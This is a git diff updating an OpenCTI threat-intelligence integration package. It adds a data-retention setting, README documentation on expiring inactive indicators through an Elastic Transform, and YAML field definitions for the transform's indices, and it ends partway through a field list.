name: score type: long description: An integer score for the indicator. diff --git a/packages/ti_opencti/data_stream/indicator/lifecycle.yml b/packages/ti_opencti/data_stream/indicator/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_opencti/data_stream/indicator/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" diff --git a/packages/ti_opencti/docs/README.md b/packages/ti_opencti/docs/README.md index 691d0dc79db..cb978681844 100644 --- a/packages/ti_opencti/docs/README.md +++ b/packages/ti_opencti/docs/README.md @@ -15,7 +15,7 @@ Each event in the log data stream collected by the OpenCTI integration is an ind This integration requires Filebeat version 8.9.0, or later. -It was initially developed using OpenCTI version 5.10.1 and updated for verison 5.12.X. +It has been updated for OpenCTI version 5.12.24 and requires that version or later. ## Setup @@ -33,6 +33,18 @@ The `indicator` data stream includes indicators of the following types (`threat. OpenCTI's data model closely follows the [STIX standard](https://docs.oasis-open.org/cti/stix/v2.1/os/stix-v2.1-os.html). It supports complex indicators defined using STIX patterns or other languages, and each indicator can be related to one or more observables. In the [ECS threat fields](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html) the focus is on atomic indicators. This integration fetches as much data as possible about indicators and their related observables, and populates relevant ECS fields wherever possible. It uses related observables rather than the indicator pattern as the data source for type-specific indicator fields. +#### Expiration of inactive indicators + +The `opencti.indicator.invalid_or_revoked_from` field is set to the earliest time at which an indicator reaches its `valid_until` time or is marked as revoked. From that time the indicator should no longer be considered active. + +An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to provide a view of active indicators for end users. This transform creates destination indices that are accessible via the alias `logs-ti_opencti_latest.indicator`. When querying for active indicators or setting up indicator match rules, use that alias to avoid false positives from expired indicators. + +The dashboards show only active indicators, except the Ingestion dashboard, which shows data from both the source data stream and the indices of the latest indicators. + +Indicators that are never expired or revoked will not be removed from the indices of the latest indicators. If accumulation of indicators is a problem there, it can be managed upstream in OpenCTI, or by manually deleting indicators from those indices. + +To prevent unbounded growth of the source data stream `logs-ti_opencti.indicator-*`, it has an index lifecycle management (ILM) policy that deletes records 5 days after ingestion. + #### Example Here is an example `indicator` event: @@ -164,6 +176,7 @@ Timestamps are mapped as follows: | modified | threat.indicator.modified_at | Time of the indicator's last modification | | valid_from | opencti.indicator.valid_from | Time from which this indicator is considered a valid indicator of the behaviors it is related to or represents | | valid_until | opencti.indicator.valid_until | Time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents | +| - | opencti.indicator.invalid_or_revoked_from | The earliest time at which an indicator reaches its `valid_until` time or is marked as revoked | The table below lists all `opencti.*` fields. @@ -180,13 +193,25 @@ The documentation for ECS fields can be found at: | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.agent_id_status | Agents are normally responsible for populating the `agent.id` field value. If the system receiving events is capable of validating the value based on authentication information for the client then this field can be used to reflect the outcome of that validation. For example if the agent's connection is authenticated with mTLS and the client cert contains the ID of the agent to which the cert was issued then the `agent.id` value in events can be checked against the certificate. If the values match then `event.agent_id_status: verified` is added to the event, otherwise one of the other allowed values should be used. If no validation is performed then the field should be omitted. The allowed values are: `verified` - The `agent.id` field value matches expected value obtained from auth metadata. `mismatch` - The `agent.id` field value does not match the expected value obtained from auth metadata. `missing` - There was no `agent.id` field in the event to validate. `auth_metadata_missing` - There was no auth metadata or it was missing information about the agent ID. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. | keyword | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | | input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if the document is a source for the transform. This field is not added to destination indices to facilitate easier filtering of indicators for indicator match rules. | constant_keyword | | opencti.indicator.creator_identity_class | The type of the creator of this indicator (e.g. "organization"). | keyword | | opencti.indicator.detection | Whether the indicator has been detected. | boolean | | opencti.indicator.external_reference.description | A description for a related record in an external system. | keyword | | opencti.indicator.external_reference.external_id | A non-STIX ID for a related record in an external system. | keyword | | opencti.indicator.external_reference.source_name | The name of an external source of related records. | keyword | | opencti.indicator.external_reference.url | A URL for a related record in an external system. | keyword | +| opencti.indicator.invalid_or_revoked_from | A time from which this indicator should be considered invalid or revoked. | date | | opencti.indicator.is_inferred | Whether the indicator is inferred. | boolean | | opencti.indicator.kill_chain_phase | The kill chain name and kill change phase name (e.g. "[mitre-attack] exfiltration"). | keyword | | opencti.indicator.lang | A language associated with the indicator record. | keyword | @@ -495,8 +520,81 @@ The documentation for ECS fields can be found at: | opencti.observable.x509_certificate.validity_not_before | The date on which the certificate validity period begins. | date | | opencti.observable.x509_certificate.value | The main value for the observable. | keyword | | opencti.observable.x509_certificate.version | The version of the encoded certificate. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.dashboard_id | The saved object ID of the dashboard belonging to the threat feed for displaying dashboard links to threat feeds in Kibana. | keyword | +| threat.feed.description | Description of the threat feed in a UI friendly format. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.feed.reference | Reference information for the threat feed in a UI friendly format. | keyword | +| threat.indicator.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| threat.indicator.as.organization.name | Organization name. | keyword | +| threat.indicator.as.organization.name.text | Multi-field of `threat.indicator.as.organization.name`. | match_only_text | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.email.address | Identifies a threat indicator as an email address (irrespective of direction). | keyword | +| threat.indicator.file.accessed | Last time the file was accessed. Note that not all filesystems keep track of access time. | date | +| threat.indicator.file.created | File creation time. Note that not all filesystems store the creation time. | date | +| threat.indicator.file.directory | Directory where the file is located. It should include the drive letter, when appropriate. | keyword | +| threat.indicator.file.drive_letter | Drive letter where the file is located. This field is only relevant on Windows. The value should be uppercase, and not include the colon. | keyword | +| threat.indicator.file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.file.hash.sha384 | SHA384 hash. | keyword | | threat.indicator.file.hash.sha3_256 | SHA3-256 hash. | keyword | | threat.indicator.file.hash.sha3_512 | SHA3-512 hash. | keyword | +| threat.indicator.file.hash.sha512 | SHA512 hash. | keyword | +| threat.indicator.file.hash.ssdeep | SSDEEP hash. | keyword | +| threat.indicator.file.hash.tlsh | TLSH hash. | keyword | +| threat.indicator.file.mime_type | MIME type should identify the format of the file or stream of bytes using https://www.iana.org/assignments/media-types/media-types.xhtml[IANA official types], where possible. When more than one type is applicable, the most specific type should be used. | keyword | +| threat.indicator.file.mtime | Last time the file content was modified. | date | +| threat.indicator.file.name | Name of the file including the extension, without the directory. | keyword | +| threat.indicator.file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| threat.indicator.file.path.text | Multi-field of `threat.indicator.file.path`. | match_only_text | +| threat.indicator.file.size | File size in bytes. Only relevant when `file.type` is "file". | long | +| threat.indicator.file.type | File type (file, dir, or symlink). | keyword | +| threat.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | +| threat.indicator.marking.tlp | Traffic Light Protocol sharing markings. | keyword | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | | threat.indicator.name | The display name indicator in an UI friendly format | keyword | +| threat.indicator.port | Identifies a threat indicator as a port number (irrespective of direction). | long | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | +| threat.indicator.registry.data.bytes | Original bytes written with base64 encoding. For Windows registry operations, such as SetValueEx and RegQueryValueEx, this corresponds to the data pointed by `lp_data`. This is optional but provides better recoverability and should be populated for REG_BINARY encoded values. | keyword | +| threat.indicator.registry.data.strings | Content when writing string types. Populated as an array when writing string data to the registry. For single string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with one string. For sequences of string with REG_MULTI_SZ, this array will be variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should be populated with the decimal representation (e.g `"1"`). | wildcard | +| threat.indicator.registry.data.type | Standard registry type for encoding contents | keyword | +| threat.indicator.registry.hive | Abbreviated name for the hive. | keyword | +| threat.indicator.registry.key | Hive-relative path of keys. | keyword | +| threat.indicator.registry.path | Full path, including hive, key and value | keyword | +| threat.indicator.registry.value | Name of the value written. | keyword | | threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.1 or OpenCTI | keyword | +| threat.indicator.url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| threat.indicator.url.extension | The field contains the file extension from the original request url, excluding the leading dot. The file extension is only set if it exists, as not every url has a file extension. The leading period must not be included. For example, the value must be "png", not ".png". Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| threat.indicator.url.fragment | Portion of the url after the `#`, such as "top". The `#` is not part of the fragment. | keyword | +| threat.indicator.url.full | If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. | wildcard | +| threat.indicator.url.full.text | Multi-field of `threat.indicator.url.full`. | match_only_text | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | +| threat.indicator.url.password | Password of the request. | keyword | +| threat.indicator.url.path | Path of the request, such as "/search". | wildcard | +| threat.indicator.url.port | Port of the request, such as 443. | long | +| threat.indicator.url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword | +| threat.indicator.url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| threat.indicator.url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| threat.indicator.url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| threat.indicator.url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| threat.indicator.url.username | Username of the request. | keyword | +| threat.indicator.x509.alternative_names | List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. | keyword | +| threat.indicator.x509.issuer.common_name | List of common name (CN) of issuing certificate authority. | keyword | +| threat.indicator.x509.not_after | Time at which the certificate is no longer considered valid. | date | +| threat.indicator.x509.not_before | Time at which the certificate is first considered valid. | date | +| threat.indicator.x509.public_key_algorithm | Algorithm used to generate the public key. | keyword | +| threat.indicator.x509.public_key_exponent | Exponent used to derive the public key. This is algorithm specific. | long | +| threat.indicator.x509.serial_number | Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. | keyword | +| threat.indicator.x509.signature_algorithm | Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. | keyword | +| threat.indicator.x509.subject.common_name | List of common names (CN) of subject. | keyword | +| threat.indicator.x509.version_number | Version of x509 format. | keyword | diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/base-fields.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..450cb87a23a --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/base-fields.yml @@ -0,0 +1,16 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. + value: logs +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: input.type + type: keyword + description: Input type. +- name: '@timestamp' + type: date + description: Time the event was received by the pipeline. diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/ecs.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..8e6f9b7386d --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/ecs.yml @@ -0,0 +1,175 @@ +# Manually define these as a workaround for failing expected values validation +- name: threat.indicator.name + level: extended + type: keyword + description: The display name indicator in an UI friendly format +- name: threat.indicator.type + level: extended + type: keyword + description: Type of indicator as represented by Cyber Observable in STIX 2.1 or OpenCTI +# Additional file hash algorithms +- name: threat.indicator.file.hash.sha3_256 + type: keyword + description: SHA3-256 hash. +- name: threat.indicator.file.hash.sha3_512 + type: keyword + description: SHA3-512 hash. +# External ECS defintions, required by the transform +- external: ecs + name: ecs.version +- external: ecs + name: event.agent_id_status +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.dataset +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.type +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: tags +- external: ecs + name: threat.feed.dashboard_id +- external: ecs + name: threat.feed.description +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.feed.reference +- external: ecs + name: threat.indicator.as.number +- external: ecs + name: threat.indicator.as.organization.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.accessed +- external: ecs + name: threat.indicator.file.created +- external: ecs + name: threat.indicator.file.directory +- external: ecs + name: threat.indicator.file.drive_letter +- external: ecs + name: threat.indicator.file.extension +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.hash.sha384 +- external: ecs + name: threat.indicator.file.hash.sha512 +- external: ecs + name: threat.indicator.file.hash.ssdeep +- external: ecs + name: threat.indicator.file.hash.tlsh +- external: ecs + name: threat.indicator.file.mime_type +- external: ecs + name: threat.indicator.file.mtime +- external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.file.path +- external: ecs + name: threat.indicator.file.size +- external: ecs + name: threat.indicator.file.type +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.marking.tlp +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.port +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.reference +- external: ecs + name: threat.indicator.registry.data.bytes +- external: ecs + name: threat.indicator.registry.data.strings +- external: ecs + name: threat.indicator.registry.data.type +- external: ecs + name: threat.indicator.registry.hive +- external: ecs + name: threat.indicator.registry.key +- external: ecs + name: threat.indicator.registry.path +- external: ecs + name: threat.indicator.registry.value +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.extension +- external: ecs + name: threat.indicator.url.fragment +- external: ecs + name: threat.indicator.url.full +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.password +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.query +- external: ecs + name: threat.indicator.url.registered_domain +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.url.subdomain +- external: ecs + name: threat.indicator.url.top_level_domain +- external: ecs + name: threat.indicator.url.username +- external: ecs + name: threat.indicator.x509.alternative_names +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: threat.indicator.x509.public_key_algorithm +- external: ecs + name: threat.indicator.x509.public_key_exponent +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/opencti.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/opencti.yml new file mode 100644 index 00000000000..2b4f5d0ff2f --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/opencti.yml @@ -0,0 +1,1105 @@ +- name: opencti + type: group + description: Fields from OpenCTI. + fields: + - name: indicator + type: group + description: Indicator fields that don't fit into ECS. + fields: + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the indicator. + - name: is_inferred + type: boolean + description: Whether the indicator is inferred. + - name: revoked + type: boolean + description: Whether the indicator is revoked. + - name: lang + type: keyword + description: A language associated with the indicator record. + - name: pattern_type + type: keyword + description: The pattern language used in this indicator. + - name: pattern_version + type: keyword + description: The version of the pattern language used in this indicator. + - name: pattern + type: keyword + description: The detection pattern for this indicator, expressed as a STIX pattern or using another appropriate language such as SNORT, YARA, etc. + - name: valid_from + type: date + description: The time from which this indicator is considered a valid indicator of the behaviors it is related to or represents. + - name: valid_until + type: date + description: The time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents. + - name: invalid_or_revoked_from + type: date + description: A time from which this indicator should be considered invalid or revoked. + - name: score + type: long + description: An integer score for the indicator. + - name: detection + type: boolean + description: Whether the indicator has been detected. + - name: creator_identity_class + type: keyword + description: The type of the creator of this indicator (e.g. "organization"). + - name: kill_chain_phase + type: keyword + description: The kill chain name and kill change phase name (e.g. "[mitre-attack] exfiltration"). + - name: external_reference + type: group + description: Fields to describe an external reference. + fields: + - name: external_id + type: keyword + description: A non-STIX ID for a related record in an external system. + - name: source_name + type: keyword + description: The name of an external source of related records. + - name: url + type: keyword + description: A URL for a related record in an external system. + - name: description + type: keyword + description: A description for a related record in an external system. + - name: observables_count + type: long + description: The number of observables related to this indicator, which may exceed the number fetched. + - name: observable + type: group + description: Fields describing related observables. + fields: + - name: autonomous_system + type: group + description: Fields describing an autonomous system observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: number + type: long + description: The number assigned to the AS, typically by a Regional Internet Registry (RIR). + - name: name + type: keyword + description: The name of the AS. + - name: rir + type: keyword + description: The name of the Regional Internet Registry (RIR) that assigned the number to the AS. + - name: directory + type: group + description: Fields describing a directory observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: path + type: keyword + description: The path, as originally observed, to the directory on the file system. + - name: path_enc + type: keyword + description: The observed encoding for the path, using the IANA character set registry. + - name: ctime + type: date + description: The date/time the directory was created. + - name: mtime + type: date + description: The date/time the directory was last written to/modified. + - name: atime + type: date + description: The date/time the directory was last accessed. + - name: domain_name + type: group + description: Fields describing a domain name observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of the domain name, using RFC1034, RFC5890. + - name: email_addr + type: group + description: Fields describing an email address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of the email address, using RFC5322. + - name: display_name + type: keyword + description: A single email display name, i.e., the name that is displayed to the human user of a mail application, using RFC5322. + - name: email_message + type: group + description: Fields describing an email message observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: is_multipart + type: boolean + description: Indicates whether the email body contains multiple MIME parts. + - name: attribute_date + type: date + description: The date/time that the email message was sent. + - name: content_type + type: keyword + description: The value of the "Content-Type" header of the email message. + - name: message_id + type: keyword + description: The Message-ID field of the email message. + - name: subject + type: keyword + description: The subject of the email message. + - name: received_lines + type: keyword + description: One or more "Received" header fields that may be included in the email headers. + - name: body + type: keyword + description: A string containing the email body. + - name: email_mime_part_type + type: group + description: Fields describing an email MIME component type observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: body + type: keyword + description: The contents of the MIME part. + - name: content_type + type: keyword + description: The value of the "Content-Type" header field of the MIME part. + - name: content_disposition + type: keyword + description: The value of the "Content-Disposition" header field of the MIME part. + - name: artifact + type: group + description: Fields describing an artifact observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: hash + type: group + description: Hashes for the contents of the url or the payload_bin. + fields: + - name: md5 + type: keyword + description: MD5 hash for the contents of the url or the payload_bin. + - name: sha1 + type: keyword + description: SHA1 hash for the contents of the url or the payload_bin. + - name: sha256 + type: keyword + description: SHA-256 hash for the contents of the url or the payload_bin. + - name: sha512 + type: keyword + description: SHA-512 hash for the contents of the url or the payload_bin. + - name: ssdeep + type: keyword + description: SSDEEP hash for the contents of the url or the payload_bin. + - name: tlsh + type: keyword + description: TLSH hash for the contents of the url or the payload_bin. + - name: sha3_256 + type: keyword + description: SHA3-256 hash for the contents of the url or the payload_bin. + - name: sha3_512 + type: keyword + description: SHA3-512 hash for the contents of the url or the payload_bin. + - name: mime_type + type: keyword + description: MIME type of the artifact, given as of the values defined in the Template column in the IANA media type registry, when feasible. + - name: payload_bin + type: keyword + description: The binary data contained in the artifact as a base64-encoded string. + - name: url + type: keyword + description: A valid URL that resolves to the unencoded content. + - name: encryption_algorithm + type: keyword + description: The type of encryption algorithm the binary data is encoded in, if the artifact is encrypted. + - name: decryption_key + type: keyword + description: The decryption key for the encrypted binary data. + - name: additional_names + type: keyword + description: Additional names of the artifact. + - name: file + type: group + description: Fields describing a file observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: hash + type: group + description: Hashes for the file. + fields: + - name: md5 + type: keyword + description: MD5 hash for the file. + - name: sha1 + type: keyword + description: SHA1 hash for the file. + - name: sha256 + type: keyword + description: SHA-256 hash for the file. + - name: sha512 + type: keyword + description: SHA-512 hash for the file. + - name: ssdeep + type: keyword + description: SSDEEP hash for the file. + - name: tlsh + type: keyword + description: TLSH hash for the file. + - name: sha3_256 + type: keyword + description: SHA3-256 hash for the file. + - name: sha3_512 + type: keyword + description: SHA3-512 hash for the file. + - name: size + type: long + description: The size of the file, in bytes. + - name: name + type: keyword + description: The name of the file. + - name: name_enc + type: keyword + description: The observed encoding for the name of the file, using the IANA character set registry. + - name: magic_number_hex + type: keyword + description: The hexadecimal constant ("magic number") associated with a specific file format that corresponds to the file, if applicable. + - name: mime_type + type: keyword + description: MIME type of the file, given as of the values defined in the Template column in the IANA media type registry, when feasible. + - name: ctime + type: date + description: The date/time the file was created. + - name: mtime + type: date + description: The date/time the file was last written to/modified. + - name: atime + type: date + description: The date/time the file was last accessed. + - name: additional_names + type: keyword + description: Additional names of the file. + - name: content + type: group + description: Fields describing the file's content. + fields: + - name: payload_bin + type: keyword + description: The binary data contained in the file as a base64-encoded string. + - name: url + type: keyword + description: A valid URL that resolves to the unencoded content. + - name: encryption_algorithm + type: keyword + description: The type of encryption algorithm the binary data is encoded in, if the file is encrypted. + - name: decryption_key + type: keyword + description: The decryption key for the encrypted binary data. + - name: x509_certificate + type: group + description: Fields describing an x509 certificate observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: hash + type: group + description: Hashes calculated for the entire contents of the certificate. + fields: + - name: md5 + type: keyword + description: MD5 hash calculated for the entire contents of the certificate. + - name: sha1 + type: keyword + description: SHA1 hash calculated for the entire contents of the certificate. + - name: sha256 + type: keyword + description: SHA-256 hash calculated for the entire contents of the certificate. + - name: sha512 + type: keyword + description: SHA-512 hash calculated for the entire contents of the certificate. + - name: ssdeep + type: keyword + description: SSDEEP hash calculated for the entire contents of the certificate. + - name: tlsh + type: keyword + description: TLSH hash calculated for the entire contents of the certificate. + - name: sha3_256 + type: keyword + description: SHA3-256 hash calculated for the entire contents of the certificate. + - name: sha3_512 + type: keyword + description: SHA3-512 hash calculated for the entire contents of the certificate. + - name: is_self_signed + type: boolean + description: Whether the certificate is self-signed, i.e., whether it is signed by the same entity whose identity it certifies. + - name: version + type: keyword + description: The version of the encoded certificate. + - name: serial_number + type: keyword + description: The unique identifier for the certificate, as issued by a specific Certificate Authority. + - name: signature_algorithm + type: keyword + description: The name of the algorithm used to sign the certificate. + - name: issuer + type: keyword + description: The name of the Certificate Authority that issued the certificate. + - name: subject + type: keyword + description: The name of the entity associated with the public key stored in the subject public key field of the certificate. + - name: subject_public_key_algorithm + type: keyword + description: The name of the algorithm with which to encrypt data being sent to the subject. + - name: subject_public_key_modulus + type: keyword + description: The modulus portion of the subject’s public RSA key. + - name: subject_public_key_exponent + type: long + description: The exponent portion of the subject’s public RSA key, as an integer. + - name: validity_not_before + type: date + description: The date on which the certificate validity period begins. + - name: validity_not_after + type: date + description: The date on which the certificate validity period ends. + - name: basic_constraints + type: keyword + description: A multi-valued extension which indicates whether a certificate is a CA certificate. + - name: name_constraints + type: keyword + description: A namespace within which all subject names in subsequent certificates in a certification path are located. + - name: policy_constraints + type: keyword + description: Any constraints on path validation for certificates issued to CAs. + - 